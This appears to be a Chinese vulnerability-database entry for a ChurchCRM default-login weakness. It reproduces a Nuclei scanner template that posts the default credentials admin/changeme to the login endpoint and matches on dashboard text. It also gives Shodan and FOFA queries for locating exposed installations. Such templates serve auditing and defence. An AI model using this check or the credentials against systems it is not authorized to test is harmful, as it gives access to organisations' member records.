churchcrm-default-login: ChurchCRM - Default Login

日期: 2025-11-07 | 影响软件: ChurchCRM | POC: 已公开

漏洞描述

ChurchCRM contains a default login vulnerability.

PoC代码[已公开]

id: churchcrm-default-login

info:
  name: ChurchCRM - Default Login
  author: Kazgangap
  severity: high
  description: |
    ChurchCRM contains a default login vulnerability.
  reference:
    - https://github.com/ChurchCRM/CRM
  metadata:
    vendor: churchcrm
    product: churchcrm
    shodan-query: http.title:"churchcrm"
    fofa-query: app="churchcrm"
  tags: default-login,churchcrm,vuln

http:
  - raw:
      - |
        POST /session/begin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        User={{username}}&Password={{password}}

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - changeme

    host-redirects: true

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "ChurchCRM", "Dashboard", "Change Password")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100961e0765ac4294309f6e3c5b483298cb91ad03da050bb65fb01964177fb9187102207fa2cd0ed6186d94f03add4656458f2b7e25b45c24fe0c611028a13f364ddc6f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐